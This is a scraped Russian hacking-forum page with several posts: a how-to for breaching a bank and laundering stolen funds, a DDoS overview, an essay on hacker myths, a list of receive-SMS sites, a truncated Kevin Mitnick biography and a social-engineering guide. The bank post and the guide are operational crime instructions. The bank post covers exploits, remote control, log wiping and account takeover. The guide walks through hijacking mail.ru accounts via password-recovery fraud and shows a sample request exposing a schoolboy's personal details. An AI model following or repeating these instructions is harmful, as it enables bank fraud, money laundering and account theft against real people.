195.xxx.xxx.127 (угадай, какому банку принадлежит диапазон и просканишь их на предоставляемые службы (ftp,www и т.д.), сможешь увидеть, что из 128 адресов работают лишь 4 — не верь им!!! Эти 4 работают для лохов — а мы с тобой найдем минимум еще штук 8 — которые и проводят все операции. Hosts Monitor — в IPTools — вещь для ентого и предназначенная. Host ALIVE!!! Помни — безопасность превыше всего! Вспомни, до чего довела небрежность старика Кевина Все будем делать аккуратно. После того, как ты выяснил какая система стоит у этих чудиков (1я буква может быть другой, надо найти эксплойт. Под ВСЕ(или почти все) системы есть эксплойты. Так вот, достаешь скачанный заранее эксплойт и сэйвишь и компилишь исходник ( с этим проблем быть не должно, хотя раз на раз не приходится). Далее ставишь им сервер прогу SpyTech Shadow Net (была первая прога, которую я купил — это НЕ троян и антивирусы ее не видят, даже когда она не вылезает из памяти,) и запускаешь ее с анонимностью и дело в шляпе. Логи ты уже подчистил (прог под энто дело просто куча). Дальше, после того как отоспишься, той же самой прогой получаешь управление Win- машинами (главное чтобы ты был под *nix'ом). А после этого лазаешь и смотришь — у кого какие файлы на диске обитают и с чем люди работают. Тебе нужно найти инфу о счетах, и каким образом они проводят подтверждение переводов и сколько подтверждений и каких должно пройти. Добираешься до клиентской базы, и если банк открывает счета по Inet'у, то подтверждение высылают по электронной почте. Ты открываешь ОЧЕНЬ похожий email (с различием в букву или цифру) на том же серваке, что и владелец счета, малость меняешь номер телефона и все возможные средства связи на другие и ставишь свой НОВЫЙ email (можешь заняться перебором паролей к его ящику). Если этот банк (в оффшорной зоне) предоставляет доступ к операциям со счетами, то есть со своего вебовского сервака, то на следующий день из W2k (c FW и каскадингом проксей) заходишь на операции со счетами и пишешь, что забыл свой пароль (можешь использовать тот, что вынул и раскодировал), они после энтого отсылают на проставленное тобой мыло либо просят повторно ввести все данные о себе (тогда лучше юзать пароль к счету, который поднял из базы данных о клиенте). Этот счет теперь твой. Зайдя под новым паролем переводишь бабуленций на анонимный счет в веб банке (который нашел через АПОРТ). Дальше — больше. Еще несколько легальных ( анонимных переводов по анонимным счетам) и ты кидаешь в итоге самую малость на карточный счет (лучше, конечно, если он на каймановых островах), и снимаешь баксов 10 в рублях в каком-нибудь банкомате (в банкоматах камеры стоят — помни! смени прикид и че-нть на башку надвинь). После этого покупаешь пиво и идешь бухать (заработал!). Добравшись в следующий раз до компа (не забыл: FW+proxy), каждый день переводишь кусочками понемножку на российский счет, и, когда все средства на твоем счете (банкомат все равно не даст снять много), топаешь в центральное отделение получать все бабки, которые не превышают лимит для налоговой. Потом закрываешь счет и уезжаешь на «деревню к дедушке». Но сначала — проверь есть ли еще контроль над банком. Все еще есть — значит, чисто сработал, либо они рогатые животные. Может, повторим? А вот и нет! Практика показала, что во 2-й раз все значительно сложней и великие люди засыпаются, когда хотят сделать себе «кормушку». Теперь сними оттуда все, что тобой было закачено/запущено. Оставь только прогу (aka virus), что переводит на твой (еще 1 реально-липовый электронный) счет в этом банке доли копеек (центов) при операциях по обмену валют и внедри ее туды — считай что ты миллионер, но такие проги быстро просекают. Part 3: End (happy) Ну вот и все — поздравляю нового КУЛ ХАЦКЕРА! P.S. Храните деньги под подушкой! A4Proxy — www.inetprivacy.com/welcome.htm PGP — www.pgpi.org IP Tools — www.ks-soft.net/ip-tools.eng/index.htm CyberKit — www.cyberkit.net NetScan Tools — www.netscantools.com Visual Route — www.visualroute.com
  11. 0men0

    Анатомия DDos

    Между тем, это одна из самых молодых хакерских технологий — ее осуществление стало возможно только в связи с действительно повсеместным распространением Интернета и проникновением его в самые разные сферы общественной жизни. Не случайно о DoS-атаках широко заговорили только после того, как в декабре 1999 года при помощи этой технологии были «завалены» web-узлы таких известных корпораций, как Amazon, Yahoo, CNN, eBay, E-Trade и ряда других, немногим менее известных. Хотя первые сообщения о чем-то похожем появились еще в 1996 году, до «рождественского сюрприза» 1999 года DoS-атаки не воспринимались специалистами по компьютерной безопасности как серьезная угроза, исходящая из Сети. Однако спустя год, в декабре 2000-го, все повторилось: web-узлы крупнейших корпораций были атакованы по технологии DDoS, а их системные администраторы вновь не смогли ничего противопоставить злоумышленникам. Ну а в 2001 году DoS-атаки стали уже обычным делом. Теперь системные администраторы крупных корпораций и государственных web-узлов со страхом ожидают Рождества-2001. По имеющейся информации, хакеры потратили год на существенную модернизацию своего инструментария, а ведь существующие схемы защиты от DoS-атак и без того недостаточно совершенны. Собственно говоря, DoS-атаки производятся отнюдь не для кражи информации или какого-либо манипулирования ею. Основная их цель — парализовать работу узла-жертвы. Собственно говоря, это просто сетевой терроризм. Не случайно поэтому американские спецслужбы подозревают, что за многими DoS-атаками на серверы крупных корпораций стоят пресловутые антиглобалисты. Действительно: одно дело швырнуть кирпич в витрину «Макдональдса» где-нибудь в Мадриде или Праге, и совсем уже другое — «завалить» сайт этой суперкорпорации, давно уже ставшей своеобразным символом глобализации мировой экономики. DoS-атаки опасны еще и тем, что для их развертывания кибертеррористам не требуется обладать какими-то особенными знаниями и умениями. Сегодняшний уровень развития соответствующего хакерского инструментария таков, что раздобыть и использовать по назначению программы, необходимые для организации и начала DoS-атаки, — дело нескольких часов для человека, более-менее ясно представляющего себе, что такое Интернет и как он функционирует. Все необходимое программное обеспечение вместе с описаниями самой технологии совершенно свободно доступно в Сети. Зато последствия могут быть весьма плачевными — жертва такой атаки может на несколько часов, а порой и дней, лишить своих клиентов привычного сервиса. Наверное, не нужно объяснять, чем это чревато для тех же интернет-СМИ или узлов электронной коммерции. Причем защититься от такой атаки весьма сложно. Анатомия атаки В общем случае технология DoS-атаки выглядит следующим образом: на выбранный в качестве мишени web-узел обрушивается шквал ложных запросов со множества компьютеров по всему миру. В результате обслуживающие узел серверы оказываются парализованы и не могут обслуживать запросы обычных пользователей. При этом пользователи компьютеров, с которых направляются ложные запросы, и не подозревают о том, что их машина тайком используется злоумышленниками. При проведении атаки DDoS множество компьютерных систем одновременно начинает генерировать DoS-атаки, направленные на общую цель. Такое распределение нагрузки по сотням, а то и тысячам систем оказывается одним из самых лучших способов решения задач, требующих интенсивного использования системных ресурсов — а атаки DDoS относятся именно к таким задачам. При этом распределение рабочей нагрузки среди множества систем не только позволяет увеличить разрушительное действие атаки, но и существенно усложняет действия по защите от нее, а также не позволяет выявить истинный адрес атакующего узла. Первоочередная задача злоумышленников состоит в том, чтобы получить доступ к достаточному числу узлов сети, чтобы разместить на них агентов атаки DDoS (так называемых «зомби»). Поскольку это сугубо подготовительный этап, хакеру неважно, какие узлы будут использоваться для атаки, и он просто перебирает все подряд в поисках наименее защищенных. Найти таковые обычно не составляет большого труда — благо, безалаберных сисадминов на планете достаточно. При этом современные инструментальные средства, созданные и используемые хакерами, по большей части, автоматизируют данную работу, а также организацию и инициализацию атак. Узлы, на которых размещены агенты DoS-атаки, называются «скомпрометированными». Обычно при проведении масштабных DDoS-атак злоумышленниками создается трехуровневая архитектура — так называемый «кластер DDoS». Это иерархическая структура, на самой вершине которой находится одна или несколько управляющих консолей. Управляющая консоль — это, собственно, и есть тот самый компьютер, с которого хакер запускает атаку на систему. Управляющая консоль формирует команды, поступающие на следующий иерархический уровень — уровень главных контроллеров. Их на одну консоль может приходиться от десятка до нескольких сотен — в зависимости от масштабов атаки. Это также скомпрометированные web-узлы, но они не участвуют непосредственно в самой атаке. Каждый контроллер, в свою очередь, координирует действия большого количества (порядка нескольких тысяч) агентов-«зомби» — это уже третий уровень кластера. И уже «зомбированные» узлы берут на себя функции по непосредственному проведению атаки на узел-мишень. Проследить эту систему в обратном направлении практически невозможно. Анализ трафика «жертвы» приведет к узлу-агенту, и даже узел-контроллер становится отыскать непросто, не говоря уже об атакующей консоли. Какими они бывают Сегодня наиболее часто используются следующие пять разновидностей DoS-атак, для проведения которых существует большое количество программного обеспечения и от которых наиболее тяжело защититься: Smurf — ping-запросы ICMP (Internet Control Message Protocol) по адресу направленной широковещательной рассылки. Используемый в пакетах этого запроса фальшивый адрес источника в результате оказывается мишенью атаки. Системы, получившие направленный широковещательный ping-запрос, отвечают на него и «затапливают» сеть, в которой находится сервер-мишень. ICMP flood — атака, аналогичная Smurf, только без усиления, создаваемого запросами по направленному широковещательному адресу. UDP flood — отправка на адрес системы-мишени множества пакетов UDP (User Datagram Protocol), что приводит к «связыванию» сетевых ресурсов. TCP flood — отправка на адрес системы-мишени множества TCP-пакетов, что также приводит к «связыванию» сетевых ресурсов. TCP SYN flood — при проведении такого рода атаки выдается большое количество запросов на инициализацию TCP-соединений с узлом-мишенью, которому, в результате, приходится расходовать все свои ресурсы на то, чтобы отслеживать эти частично открытые соединения. Специалисты по информационной безопасности выделяют семь основных групп (т.н. «семейств») инструментальных средств для организации DoS-атак. Однако на практике наиболее часто используются средства трех семейств — trinoo, Tribe Flood Network (TFN и TFN2K) и Stacheldracht. Исторически первым средством для организации DoS-атак стало trinoo. Это достаточно примитивная, по современным меркам, разработка, и она способна запускать атаку только вида UDP flood. Причем, для взаимодействия главного контроллера и агентов используются нешифрованные протоколы TCP и UDP. Благодаря своей простоте, программы «семейства» trinoo легко обнаруживаются и обезвреживаются современными средствами защиты и не представляют угрозы узлам, владельцы которых заботятся об элементарных мерах безопасности. Намного более серьезное оружие хакеров — средства организации распределенных атак TFN и TFN2K. Они позволяют одновременно инициировать атаки нескольких типов — Smurf, UDP flood, ICMP flood и TCP SYN flood. Пересылка команд и параметров при этом умело спрятана в передаваемых данных — чтобы не вызвать подозрений у защитного ПО. TFN и TFN2K требуют от хакера намного более высокой квалификации, но и практическая эффективность их намного выше (включая и защиту самого хакера от обнаружения). Представитель новейшего поколения средств организации DoS-атак — Stacheldracht («колючая проволока»). Этот пакет позволяет организовывать самые различные типы атак и лавины широковещательных ping-запросов. Кроме того, обмен данными между контроллерами и агентами шифруется, а в само ПО встроена функция автомодификации. Защита и предупреждение В случае DoS-атаки трафик, предназначенный для переполнения атакуемой Сети, необходимо «отсекать» у провайдера услуг Интернет, потому что на входе в Сеть сделать это уже будет невозможно — вся полоса пропускания будет занята. Угрозу DoS-атак можно снизить несколькими способами. Во-первых, необходимо правильно сконфигурировать функции анти-спуфинга на маршрутизаторах и межсетевых экранах. Эти функции должны включать, как минимум, фильтрацию RFC 2827. Если хакер будет не в состоянии замаскировать свою истинную личность, он вряд ли решится на проведение атаки. Во-вторых, необходимо включить и правильно сконфигурировать функции анти-DoS на маршрутизаторах и межсетевых экранах. Эти функции ограничивают число полуоткрытых каналов, не позволяя перегружать систему. Также рекомендуется при угрозе DoS-атаки ограничить объем проходящего по сети некритического трафика. Об этом уже нужно договариваться со своим интернет-провайдером. Обычно в подобных случаях ограничивается объем трафика ICMP, так как он используется сугубо для диагностических целей. Как уже говорилось, вычислить кибертеррористов, организовавших DoS-атаку, крайне сложно. Это все равно, что искать отправителя письма, в котором неправильно указан обратный адрес. Для защиты от DoS-атак администраторы узлов-мишеней должны тесно сотрудничать со своими интернет-провайдерами, а те, в свою очередь, — с операторами магистральных сетей, таких как Uunet или Sprint. Но и самый надежно защищенный web-узел неспособен выдержать многогигабайтовый трафик. В плане же менеджмента волна DoS-атак служит хорошим стимулом для разработки корпоративных планов быстрого реагирования. Такие планы особенно важны для компаний, занимающихся электронной коммерцией, так как в данном случае доступность их web-узлов — критический фактор. 3487 просмотров Нравится Не нравится
  12. Если в шестидесятых хакеры были «закрытым» сообществом, ограничивающимся институтами и научными лабораториями, то сегодня об этом слове знает каждый подросток. Хакерское движение захлестнуло массы всех возрастов и достигло до самых удаленных клочочков земли, от шумной Америки, до далекой и загадочной Новой Зеландии. О хакерах говорят, им посвящены фильмы, ими пестрят заголовки газет, радио-рынки завалены лазерными дисками с полным комплектов всевозможных отмычек, секретов, заначек… Есть и свои кумиры: Роберт Моррис, Кевин Митник, Девид Леви. С первого взгляда общество находится в состоянии полной анархии, и никакого контроля над неистребимой армией воинствующих хакеров нет. Легкость проникновения в банковские, или иные сети специально назначения, порой вызывает шевеление волос на голове, а про уязвимость «домашних» компьютеров и вовсе говорить не приходиться. Интернет представляется темным дремучим лесом, один неверный шаг и ты в глухой непроходимой чаще, где за каждым деревом горят красные глаза хакера (слишком долго просидевшего за монитором). Напуганный такой картиной молодой неопытный юзер пугливо жмется к стенке, и каждый раз настороженно озирается по сторонам, а не ждет ли за этой ссылкой, смерь его жесткому диску? И даже далекие от компьютеров люди не без содействия журналистов испытывают нервное беспокойстве. Пойди вот упадет сейчас на их головы спутник или рванет атомная станция неподалеку, от шалостей иного гнусного хакера. Сами же хакеры едва ли не на митинги с плакатами ходят под флагами «Долой нечестных журналистов. Хакер — друг человека». Однако при этом несостоявшиеся демонстранты без колебаний подписываются под лозунгом «нет такой защиты, которую нельзя было бы взломать». Так значит все-таки можно? И захват хакерами спутников это только вопрос времени? А уж электронной системе оплаты и вовсе придет каюк, если доврется до нее некий хакер под пивом? Эксперты по безопасности, многие из которых то же причисляют себя к хакерам, уже рукой махнули в попытках что-либо кому доказать. Ну не нужны общественности хакеры-профессионалы, такие как они есть, сутками сидящими за черным экраном отладчика, или по уши зарывшиеся в горы распечаток исподников Юникса в поисках программных ошибок, открывающими ворота атакующему. Это скучно и серо для обывателя и не дает никакого простора для маневров жанра. Читателей не интересуют тонкости реализации коммуникационных протоколов TCPIP в системе UNIX, им подавай сенсации и захватывающие дух разборки, погони и судебные разбирательства. Собственно, человек, внедрившийся в банковскую сеть, и умыкнувший энное количество миллионов не является хакером в прямом смысле этого слова. Это простой грабитель. «Кража ценностей посредством применения технических средств». И уже не важно, что понимать под последней фразой — фомку, электродрель или компьютер. Просто сетевой взлом это «модно», это «круто» и не важно, что наши сети очень плохо защищены, и не нужно быть семи пядей во лбу, что бы разобраться в их устройстве и снести все, что попалось на своем пути. «Электронная кража» это все-таки кража, электронный вандализм — лишь одно из проявлений хулиганства и демонстрирования собственной «крутости» и «значимости» в своих глазах или глазах окружающих. Портреты современных хакеров словно срисованы с ковбоев вестернов шестидесятых годов. Во всяком случае, идея одна и та же — одиночка бросает вызов законам… и расправляется с толпой «плохих» парней, восстанавливая справедливость. Девиз «Информация должна быть доступна всем» откровенный плагиат с Робин Гуда. Грабим богатых во имя бедных. «Программное обеспечение должно быть бесплатно!» Не дадим «нехорошим» фирмам «зажимать» его! Благородного Дона переполняют чувства оттого, что меч правосудия находиться в его руках. Ему выбирать, кого казнить, а кого миловать. «Эта фирма хорошая и мы ее ломать не будем». Мифическое «джентльменское соглашение» — хакер не должен ломать софт другого хакера. Выходит, что самим хакерам, сдирать бабки с юзеров можно, а всем другим нельзя? В действительности, все это не более чем красивые слова, скрывающие за собой непрофессионализм и невежество. Ну, нет в нашем мире полутеней. Есть защиты, а есть их отсутствие. Стремление сэкономить на безопасности, (между прочим, вполне естественно стремление, ибо пока гром не грянет...) оборачивается тем, что в большинстве случаев существует лишь видимость защиты, чисто символический английский замок на двери, открывающийся одним движением металлической линейки в руках злоумышленника. Предполагается, что честный человек увидит на двери замок, подергает его и отойдет. Надежность замка в этом случае роли не играет. «Толковый парень» из кинофильмов может открыть любой замок, но вот, увы, в действительности подавляющие большинство хакеров действуют иначе. Они методично обходят дом за домом и дергают все замки в надежде, что хоть какой из них да не заперт. Когда-то это случается… Нужно отличать целенаправленную атаку от бессистемного блуждания по сети, в поисках администратора-лоха, оставившего свой компьютер не запертым. Если такому доверить сервер стратегического назначения, еще один «Большой хак» войдет в историю человечества. О профессиональных качествах атакующего журналисты предпочитают умалчивать, выдавая последнюю за «крутость» объекта ломки. Хороший администратор «домашний» компьютер защищает куда надежнее… и потребуются чертовски нетривиальные мозги, что бы в него вломиться. Да только ли будет такая атака интересной массам? До некоторого времени журналисты предпочитали делать сенсации не на фактах взлома, а на случаях уязвимости конкретных компьютеров по причине некомпетентности, обслуживающих их специалистов. Когда же эта тема себя исчерпала, журналисты сменили ориентацию, поставив ставку на взломщиков. Запахло свежанинкой и читатель вновь потянулся к газете. Ярким признакам, что тема хакерства уже достигла своего насыщения, является откровенная спекуляция фактами и цифрами. «Зафиксировано xxx.xxx.xxx попыток взлома компьютеров Пентагона». При ближайшем рассмотрении оказывается, что это число неверно введенных паролей. Юзер ввел на удачу первый, пришедший на ум ему пароль, сервер «грязно выругался и его отшил». Число «атак» увеличилось на единицу. Как раз таки успешные атаки не фиксируются. Ибо если несанкционированный доступ рано или поздно был обнаружен, то выходит, что защита более или менее сработала. О числе успешных и не выявленных атак можно только гадать. Любые цифры могут быть получены только «с потолка», или на основании косвенных оценок в стиле «летит x самолетов, нет x мало, возьмем y». Единственным ключом к оценке могут быть санкционированные атаки, т.е. проводимые экспертами по безопасности поиски дыр в системе. С некоторой долей уверенности можно сказать, что _вероятно_ успешных несанкционированных атак было не больше, и возможно не меньше этого числа. Любопытно, что сами эксперты часто причисляют себя к хакерам и выполняют, в общем-то, хакерсую работу, т.е. «взлом» системы. Разве что делают это легально и на благо человечества, не преследуя криминальных целей. Периодически ими публикуются отчеты, содержащие сведения об ошибках, а так же рекомендации по исправлению ситуации. Это однозначно доказывает, что «большой хак» технически возможен, и что даже самые «крутые» компьютеры не гарантированы от проникновения извне. Однако, это еще не повод верить газетным публикациям и «муссируемым» журналистами байкам. Ну, просто не существует «серверов, ответвленных за наведение крылатых ракет» и заветная «ядерная кнопка» это все же не копка «пуск» в панели задач, по которой достаточно лишь щелкнуть мышью. Все это плод воображения журналистов, посеянный на свежевспаханном поле нашего поколения молодежи. Сейчас мы собираем урожай. Но перезрелые зерна уже срываются с колосьев, и интерес к этой теме начинает угасать. В хакерах остаются лишь те, кто больше любит работать клавиатурной и головой, а не искать решения на извечный вопрос «что же делать и кто виноват». «Проблема не в Кевине Митнике, проблема в том, что большинство систем действительно плохо защищены. То, что делал Митник, остается осуществимым и сейчас» сказал однажды Цутому Шимомура. Этими словами можно и закончить статью. Человечество пережило бум рыцарей, мушкетеров, ковбоев, гангстеров… и хакеры всего лишь один мазок в большой палитре. Едва нанесенный кистью Творца Истории он блестит матовым блеском, притягивая к себе внимание и еще липнет к пальцам при неосторожном прикосновении, но пройдет совсем немного времени, как он ничем не будет отличаться от точно таких же, расположенных рядом… P.S. Останутся ли хакеры спустя столетние? Или их следы заметет песок истории? А существуют ли Рыцари в нашем времени? Или быть может современные хакеры это они и есть? Полигон истории изменив, и каждый день на сцене спектакль играют все новые актеры, а старые остаются лишь в памяти, да в нашем воображении…
  13. 0men0

    Введение в СИ

    Введение в СИ. ------------------------ Содержание: 1. СИ, кратко обо всём. 2. Психология человека. 3. Методы получения информации. 4. Послесловие. -------------------------------------------------------------- -------------------СИ, кратко обо всём----------------- -------------------------------------------------------------- Дорогие начинающие хакеры (и не начинающие тоже), я рад представить Вам свою статью по Социальной Инженерии. Что такое Социальная Инженерия? В Интернете есть много описаний сему слову, но только хакер может понять это. Прежде всего СИ — воздействие на человека психологически, будь то простой одинокий человек, продвинутый юзер, беспощадные операторы и админы крупных Интернет-ресурсов. ВСЕ ОНИ ОСТАЮТСЯ ЛЮДЬМИ!!! А это значит что все они уязвимы к психологическому воздействию. Тебе, дорогой мой соратник, не надо копать литературу типа «Как загипнотизировать человека через интернет», «Как манипулировать людьми» и т.п. СИ есть этакая «Импровизация кукловода», при том объект не замечает никакого манипулятора над собой, он думает что он управляет собой и совершает все свои действия, ан нет! В общем, дорогой хакер, зная что объект атаки — человек, знай, ты — манипулятор и кукловод. -------------------------------------------------------------- ------------------Психология человека---------------- -------------------------------------------------------------- Если ты думаешь, что ты кукловод и можешь поступать с объектом как хочешь, то ты не прав. Манипулирование не заключает в себе грубое обращение. Оно может быть в следующих видах: -Жалость -Доброта -Сочувствие -Обман Каждый использует это по-разному. Простите за маленький раздел) -------------------------------------------------------------- -----------Методы получения информации---------- -------------------------------------------------------------- Итак, существуют следующие методы: -Подмена -Чувства (см. Психология человека) -Соц. сети Рассмотрим всё на примере: Объект атаки — мой соратник «хакер» (да простят меня все хакеры планеты) e-mail: [email protected] Почему мыло? да потому что на этом стоит Контакт, Одноклассники, и т.п. Шаг первый.Обдумываем «налёт» Для взлома мыла я использую сервис возврата паролей. Это специальный сервис на mail.ru, где указываешь подробно свои данные и если они совпадают то тебе на другой почтовый ящик присылают новый пароль. Создаем липовый ящик типа «[email protected]» Итак, сбором сведений займемся мы с «Контакта» и «Моего Мира». И не забудте собрать инфу о друзьях, которые у него в «Моем мире»!!! Шаг второй. «Налёт» Адрес win.mail.ru/cgi-bin/passremind?action=sendrequest&Username=default&Domain=mail.ru Итак, заполняем все данные, в местах «пароль» и «секретный вопрос» пишем взломали (((" или «украли хакеры!!!» Поля с датами. Отдельная тема. Короче дату последнего захода пишем на этот день, а рождение ест ь в «МОЙ МИР» опять-же))) Где надо заполнить поле в самом низу «доп. инфо», пишем грустную историю, о том, как злые родители запретили вход на всё, кроме уважаемого и любимого мэйл.ру и девушка сидит только в агенте и всё… Ну короче расписываем много всего, говорим про друзей, которые на «Мой мир» и т.п. указываем нужные данные в этом поле тоже) Пишем второй адрес (имя_объекта@другой_сервис.ру) Отправляем Шаг третий. Получение пароля Итак, нам должно прийти на липовый ящик следующее: ---Здравствуйте. Пароль к п/я [email protected]: bo4s8fsw (пароль я уже поменял))) Мы рекомендуем Вам установить новый пароль (http://www.mail.ru/pages/help). Также рекомендуем Вам сменить секретный вопрос и ответ на него (http://www.mail.ru/pages/help/2.html#). С уважением, Служба поддержки пользователей почтовой системы Mail.ru Если Вам пришло «Недостаточно сведений — пользуетесь моим методом, а именно: Поймите меня правильно, прошу! Мой ящик взломали и поменяли ответ на секретный вопрос, поэтому я ничего не могу указать!!! Вы же тоже люди! Это максимум из всего того, что я знаю, остальное поменяли! И тогда-то Вам точно придет пароль, проверено на 10 людях. Результат 10 из 10!!! -------------------------------------------------------------- ---------------------Послесловие------------------------- -------------------------------------------------------------- Итак, данный метод проверен мной и написан не только в ознакомительных целях Вот Вам письмо для ознакомительных целей: -------------------- -------------------- Здравствуйте. В вашем запросе на пароль к почтовому ящику [email protected] Вы сообщили следующие данные: Имя: Олег Фамилия: Салтыков Cекретный вопрос: ??? Ответ на секретный вопрос: Поменяли Пол: М Возраст: Регион: Россия Город: Солнечногорск Дата регистрации: 15-6-2008 Комментарии: [email protected] последний раз я менял пароль вчера, а именно 30.08.09, но у меня одноклассник занимается взломом и я думаю это он сделал! При регистрации у меня был простой пароль, но его я не помню, а ответ на секретный вопрос при регистрации был „Топильская“, это фамилия моей матери, чего я не забуду. Это мой почтовый ящик, в друзьях у меня моя девушка, Дарья Сучкова, [email protected], друг Эдвин, он болеет за спартак и челси, сестра, еще друг и Лена Третьякова!!! Эдвин фанат лэмпарда как и я) Программирую на Pascal, учусь на 4 и 5, с первого сентября 09 года пойду в 8-ой класс. ВКонтакте.ру я удалил страницу на всякий случай, не хочу, чтою взломали! Надеюсь Вы поверите мне, ведь я сейчас далеко от своей девушки, а родители из-за наказаня открыли мне доступ только в mail.ru и blogs.mail.ru ... Спасибо за уделенное внимание, с уважением и надеждой на администрацию Олег Салтыков! Для выдачи пароля этих данных недостаточно. По предоставленным Вами данным мы не можем выслать Вам пароль. Возможно, в Вашем запросе неверно указано имя почтового ящика или домен (mail.ru, inbox.ru, list.ru или bk.ru) Если данный п/я был зарегистрирован не Вами лично — обратитесь за этой информацией к регистрировавшему его лицу. Для восстановления пароля, укажите, пожалуйста, всю информацию, введённую при регистрации: — имя п/я; — секретный вопрос; — ответ на него; — город; — ФИО. Пожалуйста, попробуйте вспомнить: — приблизительную дату регистрации данного п/я; — какой электронный адрес был указан при его регистрации; — на какой адрес стоит в нем пересылка (если таковая имеется); — какие адреса могут находиться в адресной книге в этом п/я; — какие папки кроме стандартных созданы в нем; — с каких IP-адресов обычно осуществлялись заходы в этот п/я; — приблизительную комбинацию символов в пароле; — любую другую информацию, подтверждающую Ваши права на этот п/я. Эту информацию введите в форме для восстановления пароля mail.ru/cgi-bin/passremind?action=sendrequest&Username=trixls&Domain=mail.ru С уважением, Служба поддержки пользователей почтовой системы Mail.ru
  14. Как получить смс онлайн через интернет? Для приема смс онлайн существуют специальные сайты, которые предоставляют специальный виртуальный номер, на который вы можете получить смс сообщение. Все представленные в этом обзоре сайты бесплатные и не требуют регистрации. Я расскажу о лучших на мой взгляд сервисах для получение смс онлайн и о том, как ими правильно пользоваться. Данная статья будет постоянно обновляться, чтобы не терять свою актуальность. Поэтому если вы знаете другие сервисы предоставляющие виртуальный номер для приема смс, скиньте ссылку в коменты. Я имею ввиду что-то дельное и полезное для пользователей, а не реклама какого-то го###о-сайта! Кстати, существуют аналогичные сервисы для получения электронной почты. Такие сайты предоставляет временный почтовый ящик, которые в связке с хорошим анонимным прокси или vpn могут надежно скрыть информацию об отправителе, т.е. о вас. О таких сервисах мы писали в статье «Одноразовая почта«. Не забывайте, что отправка электронной почты дает возможность получателю узнать о вас много важной информации, такой как: определение IP-адреса, местоположения и т.д., подробно об этом мы писали в статье «IP адрес по электронной почте« Виртуальный номер для приема СМС В каких случаях может понадобится виртуальный номер для приема смс? Есть много разных ситуаций. Получение смс онлайн может использоваться в первую очередь для улучшения анонимности. Используя виртуальные номера пользователь может избежать слежки в сети интернет. Вот примеры использования сервисов приема смс сообщений. Для получения смс подтверждение онлайн. Смс онлайн через интернет можно использовать при регистрации в социальных сетях, одноклассники, вконатке и т.д. Также прием смс онлайн может понадобится при регистрация почтовых ящиков. Виртуальный номер без регистрации В данной главе я расскажу об онлайн-сервисах, которые не требуют регистрации. Этими сайтами можно пользоваться, когда необходимо быстро и бесплатно получить смс онлайн. Посылать смс на такие виртуальные номера можно только в том случае, когда в нем не содержатся никакие чувствительные данные. Чувствительными данными для меня не является код активации или пароль с логином до тех пор, пока не указанна ссылка или название сайта с которого было отправлено смс. Эта информация может быть не только в видимой части письма, но и в технических заголовках (RFC заголовки) письма. Мы рассказывали об этом в статье «Как по почте узнать IP». Ссылка была выше. Вот пример того, как нельзя использовать виртуальный номер без регистрации. Пароль и логин какого-то бедолаги я замылил, как-то не хочется участвовать в вашем взломе. Многие не очень продвинутые пользователи не учитывают, то о чем я говорил выше и такими не обдуманными действиями теряют доступ к своими и чужим аккаунтам. Поэтому если покопаться на подобных сайтах можно найти много чего съедобного. Но не забывайте, что использование чужих данных для авторизации тоже в каком-то смысле взлом. А как вы знаете, за взлом в любой стране законом предусмотрен срок. Sellaite Начнем с сайта Sellaite. Данный сайт позволяет бесплатно получить смс онлайн, используя один из свободных на тот момент номеров. Сервис не требует регистрации. Для получения смс онлайн перейдите на страницу сайта и нажмите на доступный номер. Имейте ввиду предоставляемый номер для смс может в любой момент сменится. Поэтому регистрируйте на него только то, что не потребует будущего подтверждения и привязки к номеру. Receive-SMS-Online Следующий сайт называется Receive-SMS-Online. Среди возможных виртуальных номеров часто попадаются Русские и Украинские. Что может очень полезно для нашей аудитории. Для получения смс не требуется регистрация. Заходим выбираем номер и посылаем смс. Это еще один общий публичный виртуальный номер для приема sms, так что с ним те же правила что и с первым сервисом. FreeOnlinePhone FreeOnlinePhone — сайт предоставляет онлайн номера для получения смс. Русских номеров не замечено, но не смотря на это сайт работает стабильно. ReceiveSMSOnline ReceiveSMSOnline — еще один сервис который предлагает виртуальный номер бесплатно. На момент написания статьи сервис предоставлял только Британские и Американские виртуальные номера, хотя в описании говорится еще как минимум о двух странах: Канада и Швеция. Виртуальный номер бесплатно Во время тестирования данного сервиса были задержки. С одного источника смс шла примерно 20 минут, с другого около 30. Receive-SMS Receive-SMS еще один сайт предоставляющий виртуальный номер для приема СМС бесплатно и без регистрации. Кроме бесплатного виртуального номера, предлагает продажу номеров. Цена за один номер на один месяц 9$. ReceiveFreeSMS Следующий сервис — ReceiveFreeSMS. Предлагает виртуальный номер бесплатно. И не номер, а целую кучу виртуальных номеров разных стран. Бесплатный прием смс Это лучший сервис на мой взгляд. Буду молится за его здравие, надеюсь он еще долго проживет и порадует анонимов. Имейте ввиду. Некоторые крупные сайты определяют виртуальный номер и отказываются посылать на него смс. Это происходит крайне редко, но бывает. Так что если не получается получить смс на определенный номер или вообще на какой-то сервис, то не стоит расстраиваться, пробуйте другой. Также стоит учитывать тот факт, что виртуальные номера не долговечны и имеют тенденцию часто меняться.
  15. Кевин Д. Митник Родился в 1964 в Норт Хиллз, США. Родители Кевина развелись, когда ему было три года, наделив его чертой, характерной для многих хакеров: отсутствие отца. Он жил в Лос-Анджелесе с мамой, которая работала официанткой и уделяла ребенку не так уж много времени. В возрасте, который принято называть переходным, одни начинают писать стихи, другие сбегают из дома. Кевин тоже сбежал в страну компьютерных сетей. И стал своего рода поэтом виртуозом хакинга. Свой первый хакерский подвиг он совершил, когда ему было 16, проникнув в административную систему школы, в которой он учился. Характерный штрих: он не стал изменять оценки, хотя мог это сделать. Для него важнее было другое сам факт, что он может это сделать. Ну и восхищение его друзей-хакеров, таких же подростков с лос-анджелесских окраин, как и он сам. Основное их развлечение состояло в разного рода телефонных розыгрышах. (Они могли, например, приписать чьемунибудь домашнему телефону статус таксофона, и каждый раз, когда хозяин снимал трубку, записанный на пленку голос произносил: Опустите, пожалуйста, двадцать центов.) Первая стычка Кевина с законом произошла в 1981, когда он шутки ради взломал компьютерную систему Североамериканской Противовоздушной обороны в Колорадо. Он был необычайно жаден до знаний особенно тех, которые касались телефон-ной коммутации. (В университет поступать не стал так всю жизнь и оставался ав-тодидактом.) Гадкие телефонные компании держали полезную информацию под спудом, и Митнику пришлось пролезть в корпоративные компьютеры Pacific Bell, чтобы разжиться учебниками по COSMOS'у и MicroPort'у, а также необходимым софтвером. Его и всю его компанию вскоре арестовали (сдала их подружка одного из членовбанды). Митника приговорили к трем месяцам в Лос-Анджелесском центре перевоспитания малолетних и году условно. Он быстро нарушил условия освобождения, взломав компьютерную систему ме-стного университета (точнее говоря, он просто использовал университетский компь-ютер для несанкционированного доступа с пентагоновской сети ARPAnet), за что получил 